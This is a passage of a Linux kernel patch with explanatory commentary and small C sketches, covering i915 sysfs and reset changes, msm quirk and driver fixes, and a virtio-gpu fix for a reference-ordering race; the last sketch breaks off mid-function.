+ 	return intel_rps_get_requested_frequency(&gt->rps);
+ }
+ 
+-static ssize_t cur_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
+-{
+-	u32 cur_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						 __cur_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", cur_freq);
+-}
+-
+ static u32 __boost_freq_mhz_show(struct intel_gt *gt)
+ {
+ 	return intel_rps_get_boost_frequency(&gt->rps);
+ }
+ 
+-static ssize_t boost_freq_mhz_show(struct device *dev,
+-				   struct device_attribute *attr,
+-				   char *buff)
+-{
+-	u32 boost_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						   __boost_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", boost_freq);
+-}
+-
+ static int __boost_freq_mhz_store(struct intel_gt *gt, u32 val)
+ {
+ 	return intel_rps_set_boost_frequency(&gt->rps, val);
+ }
+ 
+-static ssize_t boost_freq_mhz_store(struct device *dev,
+-				    struct device_attribute *attr,
+-				    const char *buff, size_t count)
+-{
+-	ssize_t ret;
+-	u32 val;
+-
+-	ret = kstrtou32(buff, 0, &val);
+-	if (ret)
+-		return ret;
+-
+-	return sysfs_gt_attribute_w_func(dev, attr,
+-					 __boost_freq_mhz_store, val) ?: count;
+-}
+-
+-static u32 __rp0_freq_mhz_show(struct intel_gt *gt)
++static u32 __RP0_freq_mhz_show(struct intel_gt *gt)
+ {
+ 	return intel_rps_get_rp0_frequency(&gt->rps);
+ }
+ 
+-static ssize_t RP0_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
+-{
+-	u32 rp0_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						     __rp0_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", rp0_freq);
+-}
+-
+-static u32 __rp1_freq_mhz_show(struct intel_gt *gt)
+-{
+-	return intel_rps_get_rp1_frequency(&gt->rps);
+-}
+-
+-static ssize_t RP1_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
+-{
+-	u32 rp1_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						     __rp1_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", rp1_freq);
+-}
+-
+-static u32 __rpn_freq_mhz_show(struct intel_gt *gt)
++static u32 __RPn_freq_mhz_show(struct intel_gt *gt)
+ {
+ 	return intel_rps_get_rpn_frequency(&gt->rps);
+ }
+ 
+-static ssize_t RPn_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
++static u32 __RP1_freq_mhz_show(struct intel_gt *gt)
+ {
+-	u32 rpn_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						     __rpn_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", rpn_freq);
++	return intel_rps_get_rp1_frequency(&gt->rps);
+ }
+ 
+ static u32 __max_freq_mhz_show(struct intel_gt *gt)
+@@ -376,71 +375,21 @@ static u32 __max_freq_mhz_show(struct intel_gt *gt)
+ 	return intel_rps_get_max_frequency(&gt->rps);
+ }
+ 
+-static ssize_t max_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
+-{
+-	u32 max_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						     __max_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", max_freq);
+-}
+-
+ static int __set_max_freq(struct intel_gt *gt, u32 val)
+ {
+ 	return intel_rps_set_max_frequency(&gt->rps, val);
+ }
+ 
+-static ssize_t max_freq_mhz_store(struct device *dev,
+-				  struct device_attribute *attr,
+-				  const char *buff, size_t count)
+-{
+-	int ret;
+-	u32 val;
+-
+-	ret = kstrtou32(buff, 0, &val);
+-	if (ret)
+-		return ret;
+-
+-	ret = sysfs_gt_attribute_w_func(dev, attr, __set_max_freq, val);
+-
+-	return ret ?: count;
+-}
+-
+ static u32 __min_freq_mhz_show(struct intel_gt *gt)
+ {
+ 	return intel_rps_get_min_frequency(&gt->rps);
+ }
+ 
+-static ssize_t min_freq_mhz_show(struct device *dev,
+-				 struct device_attribute *attr, char *buff)
+-{
+-	u32 min_freq = sysfs_gt_attribute_r_min_func(dev, attr,
+-						     __min_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", min_freq);
+-}
+-
+ static int __set_min_freq(struct intel_gt *gt, u32 val)
+ {
+ 	return intel_rps_set_min_frequency(&gt->rps, val);
+ }
+ 
+-static ssize_t min_freq_mhz_store(struct device *dev,
+-				  struct device_attribute *attr,
+-				  const char *buff, size_t count)
+-{
+-	int ret;
+-	u32 val;
+-
+-	ret = kstrtou32(buff, 0, &val);
+-	if (ret)
+-		return ret;
+-
+-	ret = sysfs_gt_attribute_w_func(dev, attr, __set_min_freq, val);
+-
+-	return ret ?: count;
+-}
+-
+ static u32 __vlv_rpe_freq_mhz_show(struct intel_gt *gt)
+ {
+ 	struct intel_rps *rps = &gt->rps;
+@@ -448,23 +397,31 @@ static u32 __vlv_rpe_freq_mhz_show(struct intel_gt *gt)
+ 	return intel_gpu_freq(rps, rps->efficient_freq);
+ }
+ 
+-static ssize_t vlv_rpe_freq_mhz_show(struct device *dev,
+-				     struct device_attribute *attr, char *buff)
+-{
+-	u32 rpe_freq = sysfs_gt_attribute_r_max_func(dev, attr,
+-						 __vlv_rpe_freq_mhz_show);
+-
+-	return sysfs_emit(buff, "%u\n", rpe_freq);
+-}
+-
+-#define INTEL_GT_RPS_SYSFS_ATTR(_name, _mode, _show, _store) \
+-	static struct device_attribute dev_attr_gt_##_name = __ATTR(gt_##_name, _mode, _show, _store); \
+-	static struct device_attribute dev_attr_rps_##_name = __ATTR(rps_##_name, _mode, _show, _store)
+-
+-#define INTEL_GT_RPS_SYSFS_ATTR_RO(_name)				\
+-		INTEL_GT_RPS_SYSFS_ATTR(_name, 0444, _name##_show, NULL)
+-#define INTEL_GT_RPS_SYSFS_ATTR_RW(_name)				\
+-		INTEL_GT_RPS_SYSFS_ATTR(_name, 0644, _name##_show, _name##_store)
++INTEL_GT_SYSFS_SHOW_MAX(act_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(boost_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(cur_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(RP0_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(RP1_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(RPn_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(max_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MIN(min_freq_mhz);
++INTEL_GT_SYSFS_SHOW_MAX(vlv_rpe_freq_mhz);
++INTEL_GT_SYSFS_STORE(boost_freq_mhz, __boost_freq_mhz_store);
++INTEL_GT_SYSFS_STORE(max_freq_mhz, __set_max_freq);
++INTEL_GT_SYSFS_STORE(min_freq_mhz, __set_min_freq);
++
++#define INTEL_GT_RPS_SYSFS_ATTR(_name, _mode, _show, _store, _show_dev, _store_dev)		\
++	static struct device_attribute dev_attr_gt_##_name = __ATTR(gt_##_name, _mode,		\
++								    _show_dev, _store_dev);	\
++	static struct kobj_attribute attr_rps_##_name = __ATTR(rps_##_name, _mode,		\
++							       _show, _store)
++
++#define INTEL_GT_RPS_SYSFS_ATTR_RO(_name)						\
++		INTEL_GT_RPS_SYSFS_ATTR(_name, 0444, _name##_show, NULL,		\
++					_name##_dev_show, NULL)
++#define INTEL_GT_RPS_SYSFS_ATTR_RW(_name)						\
++		INTEL_GT_RPS_SYSFS_ATTR(_name, 0644, _name##_show, _name##_store,	\
++					_name##_dev_show, _name##_dev_store)
+ 
+ /* The below macros generate static structures */
+ INTEL_GT_RPS_SYSFS_ATTR_RO(act_freq_mhz);
+@@ -475,32 +432,31 @@ INTEL_GT_RPS_SYSFS_ATTR_RO(RP1_freq_mhz);
+ INTEL_GT_RPS_SYSFS_ATTR_RO(RPn_freq_mhz);
+ INTEL_GT_RPS_SYSFS_ATTR_RW(max_freq_mhz);
+ INTEL_GT_RPS_SYSFS_ATTR_RW(min_freq_mhz);
+-
+-static DEVICE_ATTR_RO(vlv_rpe_freq_mhz);
+-
+-#define GEN6_ATTR(s) { \
+-		&dev_attr_##s##_act_freq_mhz.attr, \
+-		&dev_attr_##s##_cur_freq_mhz.attr, \
+-		&dev_attr_##s##_boost_freq_mhz.attr, \
+-		&dev_attr_##s##_max_freq_mhz.attr, \
+-		&dev_attr_##s##_min_freq_mhz.attr, \
+-		&dev_attr_##s##_RP0_freq_mhz.attr, \
+-		&dev_attr_##s##_RP1_freq_mhz.attr, \
+-		&dev_attr_##s##_RPn_freq_mhz.attr, \
++INTEL_GT_RPS_SYSFS_ATTR_RO(vlv_rpe_freq_mhz);
++
++#define GEN6_ATTR(p, s) { \
++		&p##attr_##s##_act_freq_mhz.attr, \
++		&p##attr_##s##_cur_freq_mhz.attr, \
++		&p##attr_##s##_boost_freq_mhz.attr, \
++		&p##attr_##s##_max_freq_mhz.attr, \
++		&p##attr_##s##_min_freq_mhz.attr, \
++		&p##attr_##s##_RP0_freq_mhz.attr, \
++		&p##attr_##s##_RP1_freq_mhz.attr, \
++		&p##attr_##s##_RPn_freq_mhz.attr, \
+ 		NULL, \
+ 	}
+ 
+-#define GEN6_RPS_ATTR GEN6_ATTR(rps)
+-#define GEN6_GT_ATTR  GEN6_ATTR(gt)
++#define GEN6_RPS_ATTR GEN6_ATTR(, rps)
++#define GEN6_GT_ATTR  GEN6_ATTR(dev_, gt)
+ 
+ static const struct attribute * const gen6_rps_attrs[] = GEN6_RPS_ATTR;
+ static const struct attribute * const gen6_gt_attrs[]  = GEN6_GT_ATTR;
+ 
+-static ssize_t punit_req_freq_mhz_show(struct device *dev,
+-				       struct device_attribute *attr,
++static ssize_t punit_req_freq_mhz_show(struct kobject *kobj,
++				       struct kobj_attribute *attr,
+ 				       char *buff)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 	u32 preq = intel_rps_read_punit_req_frequency(&gt->rps);
+ 
+ 	return sysfs_emit(buff, "%u\n", preq);
+@@ -508,17 +464,17 @@ static ssize_t punit_req_freq_mhz_show(struct device *dev,
+ 
+ struct intel_gt_bool_throttle_attr {
+ 	struct attribute attr;
+-	ssize_t (*show)(struct device *dev, struct device_attribute *attr,
++	ssize_t (*show)(struct kobject *kobj, struct kobj_attribute *attr,
+ 			char *buf);
+ 	i915_reg_t reg32;
+ 	u32 mask;
+ };
+ 
+-static ssize_t throttle_reason_bool_show(struct device *dev,
+-					 struct device_attribute *attr,
++static ssize_t throttle_reason_bool_show(struct kobject *kobj,
++					 struct kobj_attribute *attr,
+ 					 char *buff)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 	struct intel_gt_bool_throttle_attr *t_attr =
+ 				(struct intel_gt_bool_throttle_attr *) attr;
+ 	bool val = rps_read_mask_mmio(&gt->rps, t_attr->reg32, t_attr->mask);
+@@ -534,7 +490,7 @@ struct intel_gt_bool_throttle_attr attr_##sysfs_func__ = { \
+ 	.mask = mask__, \
+ }
+ 
+-static DEVICE_ATTR_RO(punit_req_freq_mhz);
++INTEL_GT_ATTR_RO(punit_req_freq_mhz);
+ static INTEL_GT_RPS_BOOL_ATTR_RO(throttle_reason_status, GT0_PERF_LIMIT_REASONS_MASK);
+ static INTEL_GT_RPS_BOOL_ATTR_RO(throttle_reason_pl1, POWER_LIMIT_1_MASK);
+ static INTEL_GT_RPS_BOOL_ATTR_RO(throttle_reason_pl2, POWER_LIMIT_2_MASK);
+@@ -597,8 +553,8 @@ static const struct attribute *throttle_reason_attrs[] = {
+ #define U8_8_VAL_MASK           0xffff
+ #define U8_8_SCALE_TO_VALUE     "0.00390625"
+ 
+-static ssize_t freq_factor_scale_show(struct device *dev,
+-				      struct device_attribute *attr,
++static ssize_t freq_factor_scale_show(struct kobject *kobj,
++				      struct kobj_attribute *attr,
+ 				      char *buff)
+ {
+ 	return sysfs_emit(buff, "%s\n", U8_8_SCALE_TO_VALUE);
+@@ -610,11 +566,11 @@ static u32 media_ratio_mode_to_factor(u32 mode)
+ 	return !mode ? mode : 256 / mode;
+ }
+ 
+-static ssize_t media_freq_factor_show(struct device *dev,
+-				      struct device_attribute *attr,
++static ssize_t media_freq_factor_show(struct kobject *kobj,
++				      struct kobj_attribute *attr,
+ 				      char *buff)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 	struct intel_guc_slpc *slpc = &gt->uc.guc.slpc;
+ 	intel_wakeref_t wakeref;
+ 	u32 mode;
+@@ -641,11 +597,11 @@ static ssize_t media_freq_factor_show(struct device *dev,
+ 	return sysfs_emit(buff, "%u\n", media_ratio_mode_to_factor(mode));
+ }
+ 
+-static ssize_t media_freq_factor_store(struct device *dev,
+-				       struct device_attribute *attr,
++static ssize_t media_freq_factor_store(struct kobject *kobj,
++				       struct kobj_attribute *attr,
+ 				       const char *buff, size_t count)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 	struct intel_guc_slpc *slpc = &gt->uc.guc.slpc;
+ 	u32 factor, mode;
+ 	int err;
+@@ -670,11 +626,11 @@ static ssize_t media_freq_factor_store(struct device *dev,
+ 	return err ?: count;
+ }
+ 
+-static ssize_t media_RP0_freq_mhz_show(struct device *dev,
+-				       struct device_attribute *attr,
++static ssize_t media_RP0_freq_mhz_show(struct kobject *kobj,
++				       struct kobj_attribute *attr,
+ 				       char *buff)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 	u32 val;
+ 	int err;
+ 
+@@ -691,11 +647,11 @@ static ssize_t media_RP0_freq_mhz_show(struct device *dev,
+ 	return sysfs_emit(buff, "%u\n", val);
+ }
+ 
+-static ssize_t media_RPn_freq_mhz_show(struct device *dev,
+-				       struct device_attribute *attr,
++static ssize_t media_RPn_freq_mhz_show(struct kobject *kobj,
++				       struct kobj_attribute *attr,
+ 				       char *buff)
+ {
+-	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(dev, attr->attr.name);
++	struct intel_gt *gt = intel_gt_sysfs_get_drvdata(kobj, attr->attr.name);
+ 	u32 val;
+ 	int err;
+ 
+@@ -712,17 +668,17 @@ static ssize_t media_RPn_freq_mhz_show(struct device *dev,
+ 	return sysfs_emit(buff, "%u\n", val);
+ }
+ 
+-static DEVICE_ATTR_RW(media_freq_factor);
+-static struct device_attribute dev_attr_media_freq_factor_scale =
++INTEL_GT_ATTR_RW(media_freq_factor);
++static struct kobj_attribute attr_media_freq_factor_scale =
+ 	__ATTR(media_freq_factor.scale, 0444, freq_factor_scale_show, NULL);
+-static DEVICE_ATTR_RO(media_RP0_freq_mhz);
+-static DEVICE_ATTR_RO(media_RPn_freq_mhz);
++INTEL_GT_ATTR_RO(media_RP0_freq_mhz);
++INTEL_GT_ATTR_RO(media_RPn_freq_mhz);
+ 
+ static const struct attribute *media_perf_power_attrs[] = {
+-	&dev_attr_media_freq_factor.attr,
+-	&dev_attr_media_freq_factor_scale.attr,
+-	&dev_attr_media_RP0_freq_mhz.attr,
+-	&dev_attr_media_RPn_freq_mhz.attr,
++	&attr_media_freq_factor.attr,
++	&attr_media_freq_factor_scale.attr,
++	&attr_media_RP0_freq_mhz.attr,
++	&attr_media_RPn_freq_mhz.attr,
+ 	NULL
+ };
+ 
+@@ -754,20 +710,29 @@ static const struct attribute * const rps_defaults_attrs[] = {
+ 	NULL
+ };
+ 
+-static int intel_sysfs_rps_init(struct intel_gt *gt, struct kobject *kobj,
+-				const struct attribute * const *attrs)
++static int intel_sysfs_rps_init(struct intel_gt *gt, struct kobject *kobj)
+ {
++	const struct attribute * const *attrs;
++	struct attribute *vlv_attr;
+ 	int ret;
+ 
+ 	if (GRAPHICS_VER(gt->i915) < 6)
+ 		return 0;
+ 
++	if (is_object_gt(kobj)) {
++		attrs = gen6_rps_attrs;
++		vlv_attr = &attr_rps_vlv_rpe_freq_mhz.attr;
++	} else {
++		attrs = gen6_gt_attrs;
++		vlv_attr = &dev_attr_gt_vlv_rpe_freq_mhz.attr;
++	}
++
+ 	ret = sysfs_create_files(kobj, attrs);
+ 	if (ret)
+ 		return ret;
+ 
+ 	if (IS_VALLEYVIEW(gt->i915) || IS_CHERRYVIEW(gt->i915))
+-		ret = sysfs_create_file(kobj, &dev_attr_vlv_rpe_freq_mhz.attr);
++		ret = sysfs_create_file(kobj, vlv_attr);
+ 
+ 	return ret;
+ }
+@@ -778,9 +743,7 @@ void intel_gt_sysfs_pm_init(struct intel_gt *gt, struct kobject *kobj)
+ 
+ 	intel_sysfs_rc6_init(gt, kobj);
+ 
+-	ret = is_object_gt(kobj) ?
+-	      intel_sysfs_rps_init(gt, kobj, gen6_rps_attrs) :
+-	      intel_sysfs_rps_init(gt, kobj, gen6_gt_attrs);
++	ret = intel_sysfs_rps_init(gt, kobj);
+ 	if (ret)
+ 		drm_warn(&gt->i915->drm,
+ 			 "failed to create gt%u RPS sysfs files (%pe)",
+@@ -790,7 +753,7 @@ void intel_gt_sysfs_pm_init(struct intel_gt *gt, struct kobject *kobj)
+ 	if (!is_object_gt(kobj))
+ 		return;
+ 
+-	ret = sysfs_create_file(kobj, &dev_attr_punit_req_freq_mhz.attr);
++	ret = sysfs_create_file(kobj, &attr_punit_req_freq_mhz.attr);
+ 	if (ret)
+ 		drm_warn(&gt->i915->drm,
+ 			 "failed to create gt%u punit_req_freq_mhz sysfs (%pe)",
+diff --git a/drivers/gpu/drm/i915/gt/intel_reset.c b/drivers/gpu/drm/i915/gt/intel_reset.c
+index b366743569862..10b930eaa8cb8 100644
+--- a/drivers/gpu/drm/i915/gt/intel_reset.c
++++ b/drivers/gpu/drm/i915/gt/intel_reset.c
+@@ -278,6 +278,7 @@ out:
+ static int gen6_hw_domain_reset(struct intel_gt *gt, u32 hw_domain_mask)
+ {
+ 	struct intel_uncore *uncore = gt->uncore;
++	int loops = 2;
+ 	int err;
+ 
+ 	/*
+@@ -285,18 +286,39 @@ static int gen6_hw_domain_reset(struct intel_gt *gt, u32 hw_domain_mask)
+ 	 * for fifo space for the write or forcewake the chip for
+ 	 * the read
+ 	 */
+-	intel_uncore_write_fw(uncore, GEN6_GDRST, hw_domain_mask);
++	do {
++		intel_uncore_write_fw(uncore, GEN6_GDRST, hw_domain_mask);
+ 
+-	/* Wait for the device to ack the reset requests */
+-	err = __intel_wait_for_register_fw(uncore,
+-					   GEN6_GDRST, hw_domain_mask, 0,
+-					   500, 0,
+-					   NULL);
++		/*
++		 * Wait for the device to ack the reset requests.
++		 *
++		 * On some platforms, e.g. Jasperlake, we see that the
++		 * engine register state is not cleared until shortly after
++		 * GDRST reports completion, causing a failure as we try
++		 * to immediately resume while the internal state is still
++		 * in flux. If we immediately repeat the reset, the second
++		 * reset appears to serialise with the first, and since
++		 * it is a no-op, the registers should retain their reset
++		 * value. However, there is still a concern that upon
++		 * leaving the second reset, the internal engine state
++		 * is still in flux and not ready for resuming.
++		 */
++		err = __intel_wait_for_register_fw(uncore, GEN6_GDRST,
++						   hw_domain_mask, 0,
++						   2000, 0,
++						   NULL);
++	} while (err == 0 && --loops);
+ 	if (err)
+ 		GT_TRACE(gt,
+ 			 "Wait for 0x%08x engines reset failed\n",
+ 			 hw_domain_mask);
+ 
++	/*
++	 * As we have observed that the engine state is still volatile
++	 * after GDRST is acked, impose a small delay to let everything settle.
++	 */
++	udelay(50);
++
+ 	return err;
+ }
+ 
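
The reset change has three moving parts: a 2 ms ack timeout instead of 500 us, an immediate repeat of the (by then no-op) reset on success so it serialises with the first, and a 50 us settle delay afterwards. The control flow, with stubbed MMIO helpers:

    #include <stdio.h>

    static void write_gdrst(unsigned mask) { (void)mask; }
    static int wait_for_ack_clear(unsigned mask, unsigned timeout_us)
    { (void)mask; (void)timeout_us; return 0; /* pretend the ack arrived */ }
    static void settle_udelay(unsigned us) { (void)us; }

    static int gen6_domain_reset(unsigned mask)
    {
        int loops = 2, err;

        do {
            write_gdrst(mask);
            err = wait_for_ack_clear(mask, 2000);
        } while (err == 0 && --loops);   /* success -> reset once more */

        settle_udelay(50);  /* engine state can lag the GDRST ack */
        return err;
    }

    int main(void)
    {
        printf("%d\n", gen6_domain_reset(1u << 0));
        return 0;
    }
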
+diff --git a/drivers/gpu/drm/i915/i915_vma.c b/drivers/gpu/drm/i915/i915_vma.c
+index 4d06875de14a1..c8ad8f37e5cfe 100644
+--- a/drivers/gpu/drm/i915/i915_vma.c
++++ b/drivers/gpu/drm/i915/i915_vma.c
+@@ -2114,7 +2114,7 @@ int i915_vma_unbind_async(struct i915_vma *vma, bool trylock_vm)
+ 	if (!obj->mm.rsgt)
+ 		return -EBUSY;
+ 
+-	err = dma_resv_reserve_fences(obj->base.resv, 1);
++	err = dma_resv_reserve_fences(obj->base.resv, 2);
+ 	if (err)
+ 		return -EBUSY;
+ 
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_gpu.h b/drivers/gpu/drm/msm/adreno/adreno_gpu.h
+index e7adc5c632d07..3d78efb066b1e 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_gpu.h
++++ b/drivers/gpu/drm/msm/adreno/adreno_gpu.h
+@@ -29,11 +29,9 @@ enum {
+ 	ADRENO_FW_MAX,
+ };
+ 
+-enum adreno_quirks {
+-	ADRENO_QUIRK_TWO_PASS_USE_WFI = 1,
+-	ADRENO_QUIRK_FAULT_DETECT_MASK = 2,
+-	ADRENO_QUIRK_LMLOADKILL_DISABLE = 3,
+-};
++#define ADRENO_QUIRK_TWO_PASS_USE_WFI		BIT(0)
++#define ADRENO_QUIRK_FAULT_DETECT_MASK		BIT(1)
++#define ADRENO_QUIRK_LMLOADKILL_DISABLE		BIT(2)
+ 
+ struct adreno_rev {
+ 	uint8_t  core;
+@@ -65,7 +63,7 @@ struct adreno_info {
+ 	const char *name;
+ 	const char *fw[ADRENO_FW_MAX];
+ 	uint32_t gmem;
+-	enum adreno_quirks quirks;
++	u64 quirks;
+ 	struct msm_gpu *(*init)(struct drm_device *dev);
+ 	const char *zapfw;
+ 	u32 inactive_period;
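
The enum constants 1, 2 and 3 were being ORed into and tested against a mask, but 3 == (1 | 2), so a GPU carrying the first two quirks also matched ADRENO_QUIRK_LMLOADKILL_DISABLE. Distinct BIT() values make each test independent, as this check demonstrates:

    #include <assert.h>

    #define QUIRK_TWO_PASS_USE_WFI   (1u << 0)
    #define QUIRK_FAULT_DETECT_MASK  (1u << 1)
    #define QUIRK_LMLOADKILL_DISABLE (1u << 2)

    int main(void)
    {
        unsigned old_style = 1 | 2;     /* old enum values combined */
        assert(old_style & 3);          /* false positive for value 3 */

        unsigned quirks = QUIRK_TWO_PASS_USE_WFI | QUIRK_FAULT_DETECT_MASK;
        assert(!(quirks & QUIRK_LMLOADKILL_DISABLE));   /* now distinct */
        return 0;
    }
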
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
+index 7cbcef6efe171..62f6ff6abf410 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_wb.c
+@@ -132,7 +132,6 @@ static void dpu_encoder_phys_wb_set_qos(struct dpu_encoder_phys *phys_enc)
+  * dpu_encoder_phys_wb_setup_fb - setup output framebuffer
+  * @phys_enc:	Pointer to physical encoder
+  * @fb:		Pointer to output framebuffer
+- * @wb_roi:	Pointer to output region of interest
+  */
+ static void dpu_encoder_phys_wb_setup_fb(struct dpu_encoder_phys *phys_enc,
+ 		struct drm_framebuffer *fb)
+@@ -692,7 +691,7 @@ static void dpu_encoder_phys_wb_init_ops(struct dpu_encoder_phys_ops *ops)
+ 
+ /**
+  * dpu_encoder_phys_wb_init - initialize writeback encoder
+- * @init:	Pointer to init info structure with initialization params
++ * @p:	Pointer to init info structure with initialization params
+  */
+ struct dpu_encoder_phys *dpu_encoder_phys_wb_init(
+ 		struct dpu_enc_phys_init_params *p)
+diff --git a/drivers/gpu/drm/msm/dp/dp_aux.c b/drivers/gpu/drm/msm/dp/dp_aux.c
+index d030a93a08c36..cc3efed593aa1 100644
+--- a/drivers/gpu/drm/msm/dp/dp_aux.c
++++ b/drivers/gpu/drm/msm/dp/dp_aux.c
+@@ -423,6 +423,10 @@ void dp_aux_isr(struct drm_dp_aux *dp_aux)
+ 
+ 	isr = dp_catalog_aux_get_irq(aux->catalog);
+ 
++	/* no interrupts pending, return immediately */
++	if (!isr)
++		return;
++
+ 	if (!aux->cmd_busy)
+ 		return;
+ 
+diff --git a/drivers/gpu/drm/msm/msm_drv.c b/drivers/gpu/drm/msm/msm_drv.c
+index 105b5b48e828c..681c1b889b31a 100644
+--- a/drivers/gpu/drm/msm/msm_drv.c
++++ b/drivers/gpu/drm/msm/msm_drv.c
+@@ -1271,7 +1271,7 @@ void msm_drv_shutdown(struct platform_device *pdev)
+ 	 * msm_drm_init, drm_dev->registered is used as an indicator that the
+ 	 * shutdown will be successful.
+ 	 */
+-	if (drm && drm->registered)
++	if (drm && drm->registered && priv->kms)
+ 		drm_atomic_helper_shutdown(drm);
+ }
+ 
+diff --git a/drivers/gpu/drm/msm/msm_mdss.c b/drivers/gpu/drm/msm/msm_mdss.c
+index e13c5c12b775f..3b8d6991b04e0 100644
+--- a/drivers/gpu/drm/msm/msm_mdss.c
++++ b/drivers/gpu/drm/msm/msm_mdss.c
+@@ -46,15 +46,17 @@ struct msm_mdss {
+ static int msm_mdss_parse_data_bus_icc_path(struct device *dev,
+ 					    struct msm_mdss *msm_mdss)
+ {
+-	struct icc_path *path0 = of_icc_get(dev, "mdp0-mem");
+-	struct icc_path *path1 = of_icc_get(dev, "mdp1-mem");
++	struct icc_path *path0;
++	struct icc_path *path1;
+ 
++	path0 = of_icc_get(dev, "mdp0-mem");
+ 	if (IS_ERR_OR_NULL(path0))
+ 		return PTR_ERR_OR_ZERO(path0);
+ 
+ 	msm_mdss->path[0] = path0;
+ 	msm_mdss->num_paths = 1;
+ 
++	path1 = of_icc_get(dev, "mdp1-mem");
+ 	if (!IS_ERR_OR_NULL(path1)) {
+ 		msm_mdss->path[1] = path1;
+ 		msm_mdss->num_paths++;
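
Deferring the second of_icc_get() until the first path has been validated means the error return for a bad mdp0-mem can no longer leak an already-acquired mdp1-mem path. The acquisition order, with stand-in helpers:

    static int dummy_path;
    static void *get_path(const char *name) { (void)name; return &dummy_path; }

    struct mdss { void *path[2]; int num_paths; };

    static int parse_paths(struct mdss *m)
    {
        void *path0 = get_path("mdp0-mem");

        if (!path0)
            return -1;        /* nothing else held yet: nothing to leak */
        m->path[0] = path0;
        m->num_paths = 1;

        void *path1 = get_path("mdp1-mem");   /* optional second path */
        if (path1) {
            m->path[1] = path1;
            m->num_paths++;
        }
        return 0;
    }

    int main(void)
    {
        struct mdss m = { 0 };

        return parse_paths(&m);
    }
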
+diff --git a/drivers/gpu/drm/virtio/virtgpu_ioctl.c b/drivers/gpu/drm/virtio/virtgpu_ioctl.c
+index 5d05093014ac3..9f4a90493aeac 100644
+--- a/drivers/gpu/drm/virtio/virtgpu_ioctl.c
++++ b/drivers/gpu/drm/virtio/virtgpu_ioctl.c
+@@ -358,10 +358,18 @@ static int virtio_gpu_resource_create_ioctl(struct drm_device *dev, void *data,
+ 		drm_gem_object_release(obj);
+ 		return ret;
+ 	}
+-	drm_gem_object_put(obj);
+ 
+	rc->res_handle = qobj->hw_res_handle; /* similar to a VM address */
+ 	rc->bo_handle = handle;
++
++	/*
++	 * The handle owns the reference now.  But we must drop our
++	 * remaining reference *after* we no longer need to dereference
++	 * the obj.  Otherwise userspace could guess the handle and
++	 * race closing it from another thread.
++	 */
++	drm_gem_object_put(obj);
++
+ 	return 0;
+ }
+ 
+@@ -723,11 +731,18 @@ static int virtio_gpu_resource_create_blob_ioctl(struct drm_device *dev,
+ 		drm_gem_object_release(obj);
+ 		return ret;
+ 	}
+-	drm_gem_object_put(obj);
+ 
+ 	rc_blob->res_handle = bo->hw_res_handle;
+ 	rc_blob->bo_handle = handle;
+ 
++	/*
++	 * The handle owns the reference now.  But we must drop our
++	 * remaining reference *after* we no longer need to dereference
++	 * the obj.  Otherwise userspace could guess the handle and
++	 * race closing it from another thread.
++	 */
++	drm_gem_object_put(obj);
++
+ 	return 0;
+ }
+ 
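
Both ioctls get the same treatment: installing the handle transfers one reference to the handle table, which a racing thread can close immediately, so the object must not be dereferenced after drm_gem_object_put(). A sketch of the read-then-put ordering with an invented refcount:

    #include <stdio.h>
    #include <stdlib.h>

    struct obj { int ref; unsigned hw_res_handle; };

    static void obj_put(struct obj *o)
    {
        if (--o->ref == 0)
            free(o);
    }

    static void fill_reply(struct obj *o, unsigned handle,
                           unsigned *res_out, unsigned *bo_out)
    {
        *res_out = o->hw_res_handle;  /* last dereference of o ... */
        *bo_out  = handle;
        obj_put(o);                   /* ... then drop our reference */
    }

    int main(void)
    {
        struct obj *o = malloc(sizeof(*o));
        unsigned res, bo;

        if (!o)
            return 1;
        o->ref = 2;                   /* ours plus the handle table's */
        o->hw_res_handle = 42;
        fill_reply(o, 7, &res, &bo);
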